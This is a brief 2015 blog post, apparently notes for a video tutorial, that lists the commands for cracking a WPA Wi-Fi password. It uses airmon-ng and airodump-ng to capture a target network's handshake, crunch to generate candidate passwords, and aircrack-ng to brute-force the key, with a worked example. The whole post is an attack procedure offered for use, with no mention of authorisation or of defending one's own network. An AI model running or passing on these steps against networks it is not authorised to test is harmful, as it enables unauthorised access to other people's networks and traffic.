Open top menu
Monday, August 10, 2015



airmon-ng start (interface)
airodump-ng mon0
airodump-ng -c (channel) --bssid (bssid) -w file-name  mon0 --ignore-negative-one
after get WPA hanshake 02:09
Type CTRL + C for stop airodump-ng



Now create dictionnary file with crunch:
crunch (min password Character) (max password Character) (the Character maybe used in password) -o (export-file-name.txt)

Crack with dictionary :
2:55 aircrack-ng -w password-liste.txt -b (bssid) file-name.cap

Crack without dictionary:
3:32 crunch (min password Character) (max password Character) (the Character maybe used in password)  | aircrack-ng -b (bssid) file-name.cap
exemple : #crunch 6 9 rdiamdis | aircrack-ng -b 00:11:22:55:66:77 file-01.cap


Tagged
Different Themes
Written by allitseasy

0 comments